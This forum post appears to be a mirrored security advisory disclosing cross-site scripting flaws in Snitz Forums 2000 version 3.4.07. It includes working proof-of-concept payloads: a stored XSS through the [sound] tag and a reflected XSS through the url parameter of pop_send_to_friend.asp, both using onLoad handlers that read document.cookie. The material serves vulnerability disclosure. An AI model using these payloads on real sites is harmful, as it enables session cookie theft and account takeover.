Web App Security

Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities

View: New views
1 Messages — Rating Filter:   Alert me  

Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities

by Andrea Fabrizi :: Rate this Message:

Reply to Author | View Threaded | Show Only this Message

**************************************************************
Application: Snitz Forums 2000
Version affected:  3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@...
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u"
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif" onLoad
="alert(document.cookie)">

Note the space: onLoad<space>="alert(document.cookie)"
######

--
Andrea Fabrizi
http://www.andreafabrizi.it
Free embeddable forum powered by Nabble Forum Help